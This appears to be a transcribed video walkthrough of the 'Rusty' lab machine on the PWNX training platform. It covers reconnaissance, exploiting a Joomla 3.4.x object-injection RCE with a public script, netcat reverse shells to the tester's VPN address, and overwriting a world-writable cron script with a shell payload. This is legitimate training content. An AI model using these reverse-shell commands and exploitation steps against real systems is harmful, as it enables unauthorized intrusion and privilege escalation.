Hello everyone, today we're going to do the Rusty Machine from PWNX platform. It is a new platform just like Try Hack Me and Hack the Box. Uh, I'll say that this platform has a lot of realistic machines and not the CTFY type of machines that you probably get around in Try Hack Me. I can say the machines on this platform are realistic just like on Hack the Box, and there's no CTFY machine as of now that I have come around. So that being said, let's jump straight into the walkthrough of this box. So as usual, we are going to run an nmap scan. Instead of using nmap, I'm going to use the rust scan because it's a lot faster. So let's look at the syntaxes here. We have rust scan, then dash a is to specify the target IP, this is the IP, then dash dash u limit is to specify the speed of the scan, you can say. So 5000 is by default the speed. It is pretty much fast, and whatever you specify after these double dashes will be passed on to the nmap scan after rust scan detects the available ports. So for example, if rust scan detects 80 and 445, these two ports open, then these two ports then the nmap then these two ports will be passed on to the nmap, and nmap will scan it using our flags that we specify here. That is dash A is to, as you might know, for the aggressive scan, and then dash PN is to not ping the host or not to ping ports in order to detect them, because some ports might not respond, and they could be available or they could be open, but they could not respond, and nmap will think, oh, this port is not responding back, so it's closed. So in order to not think like that, we are going to specify the dash PN flag. Then next flag is dash on. Oops, sorry, dash on. This one is to output the nmap results in our rust scan all.txt file. Press enter and we can see right off that it finds port 80 open, that is for HTTP, as you might know. So let's quickly take a look at the HTTP port here while this scan is running on the nmap. Yeah, as you can see here, nmap, this is the syntax. So let's take a look at the web server running. Okay, we can see the home title here. Also, we can see it's a blog, and we have a login form here. And then we can also take a look at the webalizer where it tells us. We can see it's running a CMS, Joomla CMS, and Apache version 2.4.41 is running. We have two pretty good information here, at I guess three. We know that it's using PHP. Also, it's using the content management system Joomla, and it's also using Apache 2.4.41. So let's take a look if we can. Oh, okay. So nmap scan is finished, and we can see here it says HTTP title home, just like you can see here, and you can see Apache 2.4.41 Ubuntu, just like our webalizer scanned a couple seconds ago. And here we can see support methods, nothing interesting here. Then this is the favicon MD5. This is the MD5 sum of the icon of Joomla that you can see right here. Nothing less interesting. Then we have robust.txt file, which has 15 disallowed entries following the Joomla administrator bin cache, etc., etc. Actually, these directories are fetched from the robust.txt file, and you can see here this directory is very common in most of the websites, and this is where the nmap has fetched the directories. Okay, so we can see there's nothing interesting. We can also see there it detects the Joomla open source content management. All right, so yeah, as I was saying, that we can see here that Apache 2.4.41 is running. Let's check if there is any available exploit of this. So I'll say Apache 2.4.41, press enter, and it's taking its time, and we can see here Apache plus PHP, and it has an exploit available, but the version should be less than 5.3.12, and it's a CGI bin remote code execution. We can see another one with a remote code execution plus a scanner, but it requires Apache with the PHP. So let's take a look at the exploit script here. So let's copy this to our current working directory with the -m flag, then paste the path, and then we have it copied here. Let's take a look at the contents of the script, the nano text editor, and here we can see that our CGI bin directory is a must here. In this case, if a CGI bin directory exists, then this is chance of being exploiting this version of Apache. So let's check if CGI bin exists, and we can see it says not found. So this exploit will not work, and we should go ahead. And there's no other exploit available Apache. That is interesting. So let's skip that one. So let's take a look at the rest scan. Okay, so we only have port 80 open, nothing else. So therefore, I'm going to launch a GoBuster scan right off. So I'll say GoBuster dir for the directory brute force mode, and instead of 10, 10, 10, 12, I'll say 10, 10, 15 because this is the IP. Then we are going to use a word list, directory list 2.3 medium, and here I have specified -x flag to search for the files that might have extension PHP, HTML, or TXT. And I've specified the threads to be 60 to make this scan a little bit faster. Pressing enter and it's taking its time. We can see the media templates pop up on our screen. Till then it's running, let's take a look at this login form. We can see it's a login form. We're asking for the username password. Whenever I see this kind of username password prompt, I always go for the admin at first. If it fails, let's take a look if it fails, and it did. Okay, so let's try a common SQL query. I'm pretty much sure this will not work because this is Joomla, and they could have fixed it. We need to know the version number in order to search for the available exploits, but we do not know what's the version number of this Joomla. So my next step would be to take a look at this files here. Also, it's an open source software, Joomla. So we can search for a GitHub directory of Joomla in order to know the default directories that might exist. So yeah, this is the GitHub. And let's take a look at the files available on Joomla root directory. So let's click on the Joomla CMS. And here we can see that we have a webconf.txt file available, and then these couple of folders like modules, plugins, templates, and temp, API administrator. And if you can see, some of these directories are already detected by the GoBuster scan. We can see media, templates, and that was PHP and temp right here, and also administrator. So these directories are similar to these ones, so I'm pretty sure these all files will be should be on this server, just like we can see here. So there's nothing gonna be interesting here. So what I am going to do next is, as I do not know what version is running, and our next step should be to know the version number that this is running in order to exploit it or to look for the available exploit. So how can I look for the version number? I'll simply go on to Google and search Joomla scanner that might scan for the existing vulnerabilities. So I'll say Joomla scanner GitHub. Yeah, GitHub is the place where you can find all the Kali Linux tools. Here we can see a couple of tools listed. That is Joomla Scan from PWNX. These two tools are the same. But the thing with this tool is that these tools, I guess, are not updated from a long time or not maintained. You can see here it says 4 years ago, 6 years ago. And then same goes for the other one. So I'm going to skip them. Instead, I will get over a tool named Joomla Scanner, and also another one that is Joom Scan. Let's open these two. And oh, sorry, this is the same one that we just encountered. Let's close that one. Okay, so we have a Joom Scan tool from OWASP. This is OWASP Joomla Scanner project. And you can see the exploit has been updated 10 months ago, exploit folder. So it looks like this one is updated. And this one is from OWASP, and it scans for the available vulnerabilities and also for the version number running on the CMS. So let's run this tool. We can see how we can install it. You can just do git clone, then cd, and then just do perl joomscan.pl. So I have already installed this tool. So what I'm going to do is, so I'm going to say joomscan, and then with the -u flag, let's just take a look at the help menu here. We can see here you can specify the URL with the help of -u, and then -ec scans for the components. Components are also called plugins, or components are also called plugins that you have encountered in WordPress before. Okay, so these two are the main ones. So I'll say joomscan -u and 10, 10, 10, 15, and then I'm going to enumerate the components also. So the reason for scanning the components is that these components or plugins may be vulnerable to exploit. And just like if you have ever used WP scan tool to scan the WordPress website, you may have encounter that some plugins are vulnerable, and due to which you might have compromised the WordPress website. Same goes for the Zoom scan. We can enumerate the plugins or the components and then exploit them if they are vulnerable, and then compromise the Joomla server. So let's see, it's still scanning for the firewall, and it says firewall not detected. Oops. And then it goes on to detect the Joomla version to be 3.4.5, and based on that version number, it detects the following exploits. Perfect. And then we have tons of exploits here, and let's see. Uh, as of now, we do not know how this detected to be 3.4.5 version. Here we can also see it says the admin folder to be administrator, and then it checks on the robot.txt file. So you might be wondering that how this tool detected the version to be 3.4.5. So for that answer, I'm going to set up a proxy here, and I have already done that. If you go to website, go to options, and then click on add, and then you can type in here 8081, and in the request handling, type the IP of the Rusty's machine, and then redirect this to port 80. I've already set this up, so I'm going to click on cancel, and you can see here it's listing on the interface localhost 8081, and whatever request you made to this IP with port 8081 will be redirected to our Rusty scan. So if you make a request to this server, we can actually intercept that request, and then that request we can modify, and that request will be redirected to Rusty machine. The reason of doing this is that I can catch the request that will be made by this Zoom scan tool inside the website. So I'll say Zoom scan issue 127.0.0.1 and then 8081, and then press enter. Here in the website, we can check the HTTP history, and we can see it's making the following request. It made a request to the homepage, and then it says 200 OK, and then etc, and then we can see it's making a couple of requests here, and it already found the directories. So in order to get the answer of how it detected the version number, I'm going to stop this, run this scan again, but with the intercept on. Let's run this. It's making a get request to the home page, and then it's going to the Etsy. It is still on the firewall detection page. It says firewall not detected. Okay, now it's going to the plugins, and then let's see. Let's intercept the response. It says firewall not found. Then again home page, get request to the home page, and here you can see it's making a get request to administrator manifest files joomla.xml. Let's do intercept response to this request, and we can see here it says detecting Joomla version. So this request might be detecting the version number. So let's forward this, and we can say it says 200 OK, and inside this directory we can see the version to be 3.4.5. and so yeah, this is how Joom scan detects the version in use, by making a get request to the following folder, and yeah, that's the answer of our question right here. And based on that version, it detects the available exploits. Perfect. So let's see the exploits that we can make. Here we can see there are a couple of exploits like account creation, privilege escalation. So let's check out this exploit here. Alright, so this exploit says that choose the username, password, and email address to use and point it at the URL for your Joomla website. Okay, so this here's the syntax of use, the Python file, and then you need to specify the username and password to use. Well, we do not have any username and password of any user. Also, there's no URL of creating any user, and therefore, so I guess we need to skip this exploit because we do not have any credentials right now. Let's check out the another exploit, that is Joomla remote code execution privilege escalation vulnerability. I guess this one is a post exploitation vulnerability, not sure. It says admin takeover. Okay, so this is the page where it's going at first. This is form URL. It says index of PHP users view registration. So looks like it's going to the registration page to register a user. Let's check out if this page is available on our server. And going to this, it simply takes us nowhere, I guess. Oh, it redirects us back to the login page. So it looks like this directory is either forbidden to view, or it's not available. I guess it's forbidden. Yeah, we cannot register any user. So we are stuck on this. We are stuck without any credentials. So we have to skip this exploit also because we do not have any credentials. So skipping this one, let's check out the another one. Here we can see it says co-directed traversal vulnerability. I'm gonna skip them because when I searched for them, there was no vulnerability or actually POC found, proof of concept. Here we have, it says a vulnerability which was classified as critical was found in Joomla, but there's no POC like how we can exploit it or what is the location that was exposed. Same goes for this one. While in the city of machines, we cannot do cross-site request forgery, CSRF. Then we have security bypass vulnerability. Let's check this out. Here it says incorrect use of unfiltered data allows for existing user's account to be modified. Well, I'm not sure if there is any account existing on the server. We cannot create any, but there should be an admin user, I guess. And then we have another one that is PHP Mailer remote code execution vulnerability and that incomplete fix of RCE here too. Well, I am losing hope right now because all of these ones did not work. So I'm not sure what to do right now. Well, let's search for this version number simply on Google and let's not rely on the results of this tool. So now I'm going to search Joomla 3.4.5 exploit simply on Google. And here we can see a couple of results. On the exploit DB, we can see it says object injection remote command execution. That is given the CVE 8562. I guess this was already been given to us. Let's search. Yeah, searching for the CVE, we can see we cannot find this. So it looks like Joomla can miss this. Oh, wait. 2015. It was 8562, I guess. Yeah, 8562. We can see 8562 is not found. So it looks like Joomscan missed it. So let's check this exploit. So that is why you should not always rely on the tools and instead do the normal enumeration. So let's download this. I'll say wget raw, okay, 38977. I'm going to rename it to Joomla object injection.py. Okay, so let's add this script quickly and let's specify 10 10 10. Oops, the IP of our machine, let's send it in 15. And let's see what the script does. So Python 3, oops, yeah, Python 3 Joomla oy.py, and we can see, okay, so it looks like we need to use Python 2. This is not Python 2, it just hangs there. And we can see it says response 500. So it looks like something went wrong. Let's just try another one. Looks like the developer of this machine has fixed most of the available public exploits, so that is why we cannot find any exploit working. So let's skip this one, and I'm not going to get deep into this and forwarding the request to the professor to intercept what's going on. I'm not going to do it because I've already wasted a lot of time doing that in my previous exploits. So, and now I'm going to go ahead and search for the one that may work without any inspection, because this developer is smart. He has fixed most of the publicly available exploits. So that is why we cannot find any exploit working with the Joom scanner tool that we used, because it's possible that the developer might have used, the administrator of the blog might have used the same tool and fixed all the available exploits that were thrown on his screen with the Joomla scanner tool. So that is why I'm going to Google and searching for the exploits that are not included in the Joomla scanner. That being said, let's see. I guess I've already checked this one out. HTTP header unauthenticated RCE. Another one is Rusty Joomla's RCE from blog.activesecurity.com, and I guess this one will work because our machine is also named Rusty. So let's close this and let's check this one out first. Here we can see is the description says that this Joomla version suffers from unauthenticated RCE. Okay, so there's a actually Metasploit module available. To my personal experience, I hate using Metasploit. Sorry for the Metasploit fans, but I do not like using Metasploit, so I am going to keep this aside for the last option, and then let's take a look at this one. Okay, so we have and a very really long article, and this is it says a PHP object injection was discovered in the wild and patched in the 3.4.5 version, that is CV 2015-8562 that we just saw and used. This one, this is 8562 CVE. That is why we can see response 500 because this was fixed in this version. You can actually read this. It's gonna take a lot of time if I read this, but the simplicity, if I say it in a couple of words, the thing is that there's a object injection vulnerability in the session storage thing. So the sessions are stored in database.php file, I guess, inside the libraries. Yeah, this PHP file, and this PHP file is publicly available. So if I go to this directory, you can see this PHP file is available, but since we cannot see PHP source code because PHP executes its source code, not like HTML. Therefore, I guess it might be hurting your eyes, so let's turn on Dark Reader. Okay, so this is the vulnerability. So it looks like this is a kind of serialized object that is sent, and then when upon deserializing by database.php, that object is interpreted, and that contains our code that we push onto the server, and which grants us the root shell kind of. So you can see exploitation here. It says in order to trigger our object and achieve RCE, we need two parameters. The first one is cause the overflow, the stack overflow, and the second one will cause our exploit to yes, the second one will contain the last part of the exploit that will count as the RCE. So the perfect target for this is the login form with the username and password field. So the plan is to overflow the username field with enough /0/0 characters so that it might overflow, and in order to land in the password field. So once you overflow the username field, it will land on in the password field, and once you are inside the password field, we will reconstruct a valid object, and then we will send the exploit because this will end up in the password field, and then trigger that exploit with the help of redirect. So that being said, you can actually read this and understand what is going on. Otherwise, if I'm going to explain all of this, then it might take hours. And here you can also see there's a proof of concept video of how this works. So here's the exploit given, I guess. So let's check this out. It says Joomla 3.4.6 configuration.php remote code execution. So let's download this exploit pretty quickly. And then I'm going to say wget this, that is 47465, and then let's rename it to rusty.py. Let's try running it. So python 3 rusty.py. Okay, so it says the following arguments are required. There's -t. Okay, so -t 10 10 10 15 -c. What does -c do? Let's check out the help menu. -h. Okay, so -c checks if this server is vulnerable, and if it is, then okay, so -e also does the both things. It checks and also exploits. And we have the lhost and the lport. Okay, so let's do the -e. We will check and exploit at the same time. So -t 10 10 10 15, and then -e to exploit, then -l to specify the lhost. So 10 tell 3330, that is your PWNX VPN IP, and then -p to specify the port, that is 80. So I'm going to open an article listener port 80. So I receive a shell when a request is made, so press enter. And we can see it says invalid URL. Okay, so we need to specify HTTP here, then press enter. Okay, so it's generating session cookies, CSRF tokens, and it says seems not vulnerable. Okay, why does it not seems vulnerable? Maybe I need to add another slash here? Not sure, let's just see. So it seems not vulnerable. Well, okay, so now I'm going to pass this to proxy and check what's going on. Turn on the intercept, press enter. Okay, so a GET request is made to the home page, and then another GET request with a cookie that was assigned to us. Let's check the response. Okay, it says 200. Okay, and then it took the session cookie and also the CSRF token for the login page. and then it sends a post request to the home page with this cookie set. And also the username is set to /0/0, a long string that overflows it, just like we saw in the article. And then the password field is set to our serialized object. And then option com users, task is user.login, and this one is, I don't know what it is. So let's check out the response of this request. It says 303C other. It's taking us back to the login page. Okay, so let's forward this. And again, okay, so we are making get request to the login page now. Forward this, and it says 500 internal server error. Okay, it says fail to decode session object, error displaying the error page, error initial in the session. Okay, so let's forward this. And this is where it says seems not vulnerable. Well, according to my experience, this should be vulnerable because we can see here 500 internal server error, and here it says fail to decode session object. So our object was indeed inserted into the file. So our overflow did work, but I guess the object was not correct. The syntax was somewhere wrong, I guess, because of which it did not work. And why am I saying this? Because of course it's not working. It should be exploitable. So let's see. I send this to repeater. Send this again. Says 303C other 200 token valid token. Yeah, token is need to be generated again. As I said, that I'm pretty sure this script should work, and there's a problem. So let's simply search this RST Joomla RCE, and we can see here it says up to this version. Let's check out. Here we can see it's a PHP object injection vulnerability, and here we can see it says I just fixed the existing exploit and I did not find the exploit. Okay, so we can see that the previous version of the exploit was having some problem, and so this guy just fixed it. So let's try downloading this exploit. So I'm going to raw, and then let's copy this. Let's wget. Okay, now I'm going to say Python 3 and then exploit.py. Oh, okay, so we need to specify the target IP. So 10, 10, 10, 15. And then, oh, okay, I need to specify HTTP. Oops. Okay, press enter. It says, okay, so it got the CSRF token, then it says sending exploit. And then again, the same error of unexpected end of serialized data in the session.php file. And amidst of all these errors, actually we can see one thing, that is -data. Our exploit did work and it executed whoami command. So let's take a look at this exploit script, and here you can see the command that is to be run, that is whoami. And here we can see the object has been changed, and as I was sure that that previous exploit was having some problem with the template or the serialized object, and because of which that thing did not work. So let's change this command, and instead of changing this command, I'm going to make this available as a variable so that we can assign that variable like we assign the IP of the machine. So I'm going to say sys dot argv and say 2, save it, exit out, and then let's see, let's say 10, 10, 10, 15, and I will say execute ID. Oops, I accidentally typed in nano. Let's say Python 3. Oh, of course I need HTTP here. Okay, so now you can see and it's saying UID. Okay, so our command is indeed working. Okay, so we can see that we have a command execution on this box. So let's see if netcat is on the box or not. So I'll say vhnc. Oops. Let's put that inside double quotes, or it will be treated as a third variable. So let's see. Here we can see it says user bin nc, so netcat is installed on the box. Therefore, oops. Okay, so we already have the netcat listener of port 80. So let's execute a command to get a reversal back. So nc 10, 33, 3, 30, and 80. specify dash e and then bin bash. Press enter, and we have a connection. So I'll say wmi. We can see www-data. Okay, so now let's make this a fully TTY shell with the help of Python. Sorry, my tapping is a bit slow right now because I am inside a room that is dark with no lights. So, okay, perfect. Let's exit out of this. And then we are inside the server as www-data. That is very, very nice. So this was a long way of solving the box, and it did take pretty much time, and that is how I solved the box. I struggled a lot, and instead of searching the exploit on search exploit and testing the exploit available of 3.4.6 version, I ended up a lot of time debugging the previous exploit scripts, due to which it consumed 1 day to get a foothold on this box. So that is why you should not always rely on the tools, the results that they give. You should not always rely on them. Instead, do your own research. Try out multiple exploit scripts that are available all over the internet on the exploit.db, search exploit, or the tool that tells you. So that being said, let's take over the user now. Okay, so there's a lot of things to do right now. We do not know what user are inside the machine right now, so I'll say get etc password. And here we can see that we have a root user as usual, and then we have another user here named PWNX, and this is the user we are aiming for right now. And in the PWNX machines, you can see that we do not have to take the root user. The PWNX is the root user. So you can see that we are inside the Docker container. We do not have to break out of the Docker container because we are intentionally put inside this Docker container, and we need to get a root on this Docker container to solve this box. So we need to get PWNX user on this Docker to solve this box. Okay, so we can see that we have PWNX user here. If I cd into this folder, we can see the flag 2 here, but it is only readable by the PWNX user. And we can also see a bash logout, bash rc. If there would have been a file named bash history with some file contents in it, we could have enumerated it and look for the files or sensitive content that that user might have typed in, because every history, the commands tab are logged into the bash history file. Okay, so now there's a little bit of enumeration need to be done. Since this video is already too much long, I'm not going to do unnecessary enumeration. Instead, I'm going to go straight on the point, that is cron tabs. So let's see if there's any cron job running. So I'll say get etc cron tab, and here we can say we can see that nothing running right now. Let's give the shell, and let's see. If you do not know, then there's binary available for Linux named as PSPY. With the help of PSPY, you can actually look at the services or the commands being run in the background, and the things that are going on in your server or the machine that you normally cannot see. See what commands other users are running, what they're doing with the help of this PSPY64. If you do not have this already, you can get this from GitHub. So I'll say PSPY64, Linux, and GitHub. So yeah, you can actually monitor Linux processes without the root permissions with the help of this tool, and you can actually snoop up them, kind of. So if there's a cron job running already and you can see it, but it's doing something in the background, you can look at this with the help of PSPY tool, and that is what we are going to do right now. So you can actually download it simply, just like the same way, using git clone. Okay, so now I need to get this PSPY into this machine. So for that, I'm going to use curl, but we can see that curl is not available. We can use wget. Wget is not available also. Therefore, now I need to do some magic, and that magic is with the help of netcat. So I'll say this kind of a little bit, maybe it could be hard for you, or you might have already done it. Let's see. So I'm going to the temporary folder, and here I can see some other users have created some folders here. Let's just neglect them, ignore them. So let's make a connection. I'll say netcat 10 10 10 15 on the 9001 port. And what do you want to do now? When this connection will be made, I'm going to insert all the contents of this PSPY64 on the connection that will be made. But before that, I need to convert this PSPY to base64 because it might have invalid characters that might break the connection. So I'll say base64 PSPY and then send the contents of PSPY to base64 underscore PSPY. I guess that's done. Yeah, it is done. So we will transfer base64 PSPY to this machine, and when we receive it, we will decode it from base64, and we will have the same file there. So it's a nice handy trick to remember. So NC 10 10 10 15 9001, and then send all of the base64 PSPY contents to that uh, a connection that will be made. Now, if we open a netcat listener, everything that is inside this file will be thrown on this screen, but we do not want that on the screen, but instead we want that content to be saved to a file. So you might have already guessed it what we're going to do. Open a netcat listener first on 9001, and whatever is printed on the screen, throw that content into PSPY64, and then I name it base64. You can name it anything, and press enter. So press enter here, and then we can see connection has been made. And just wait a couple of seconds because this file is a big, and there might be it might take 5 to 10 seconds for the file to download. So it would have downloaded now. So I'm going to cancel the connection now, and let's see if the file has transferred. And we can see here, indeed it is. You can also notice that the file size is same as this one right here. So these two files are the same. We have transferred them. Now let's decode it from base64. So I'll say echo PSPY base64. Oh, sorry, not echo. Instead, cat are the contents of this file, and then base64, decode them, and save that content to PSPY64 file. Okay, I guess that's done. Let's check out PSPY64 file size is this, which is same as this one, which confirms that our file is successfully transferred. We have successfully transferred it. Now let's give it executable permissions, PSPY64, and let's run it. Before doing that, I would like to convert this shell to a fully TTY shell. So press Ctrl Z, STTY, -echo, FG, press enter again, and we have this shell TTY. The advantage of this is that if you press Ctrl C, the shell will not die. Instead, it will cancel the command that's running. So I'm gonna do PSPY64, run it, and we can see now it's monitoring the Linux processes now. And here we can see all we can monitor everything that's running right now. We can notice the UID and the PID of the user that is running this. So we can see UID 33 is of www-data user, the user that we are currently as. That is running. That user is running Apache 2 server, and because server is usually run as www-data user. Okay, so instantly we notice UID 0, and UID 0 is a root. So we can say that root user is executing a cron job, and that is executing a shell script. And okay, so this is, you can see here 1000 is of the user PWNX that we will be taking over. So the PWNX user, oh my god. Okay, so some other user actually ran Linium. Okay, never mind. Okay, so yeah, we can see that cron.sh is executed by the PWNX user. So which resides in this folder. So let's check out this script to see what it's doing. So let's switch over to the directory. Oh, okay. Let's see that file actually. cron.sh, we can see that this file is owned by root, and it is readable and writable by anyone. So it looks like we can actually edit this file. So without any further ado, let's quickly edit this. So I'll say nano. Okay, nano is not available actually. So let's just see the contents of the file here. We can say it says echo 1. So it's just executing echo 1 and it's doing nothing. Quickly, now let's take advantage of this to get a reverse shell back. So I'll say netcat 10 oops 1033 330. Oh my god. Yeah, 1033. Oh my god, what am I doing? 1033 330 1234, and then execute bin bash when we receive a connection so that we can have reverse shell. Okay, so paste this throw this content of into cron.sh file. Okay, so I guess that's done. Now open and let's get this node port 1234. So when this cron job executes another time, it will execute the command and we will receive a reverse shell, because instead of echo 1 we have placed our netcat listener payload here that will grant us the reverse shell. Also we can execute PSPY till then. Let's see if we are receiving a shell when that cron job is executed. So launch this again, and let's wait for that cron job to execute and pop up on PSPY. And if our command that we pasted in the cron job is successful, we will receive a reverse shell right off. And if we do not, then we will also know that there's something wrong and we modify our payload. So that is the advantage, and that is why I'm using PSPY here. So let's just wait for it. And here we can see it is running again and we get a connection back. So let's see, who am I? SS PWNX. Oh my god, perfect, we owned this box. So import pty.spawn. Oops. Again, I am in a rug room, that's why I cannot type correctly. Okay, so let's go to home. I guess we're already in the home directory. Indeed we are. And here we have our flag too. And I guess someone is executing din enum again. So let's stop the script. Yeah. So I hope you learned something new. And if I did something wrong, if I did some enumeration wrong, then I'm very, very sorry. And I'm always looking forward to learning from you guys also. I hope you enjoyed this one. And I'll see you next time. Bye bye.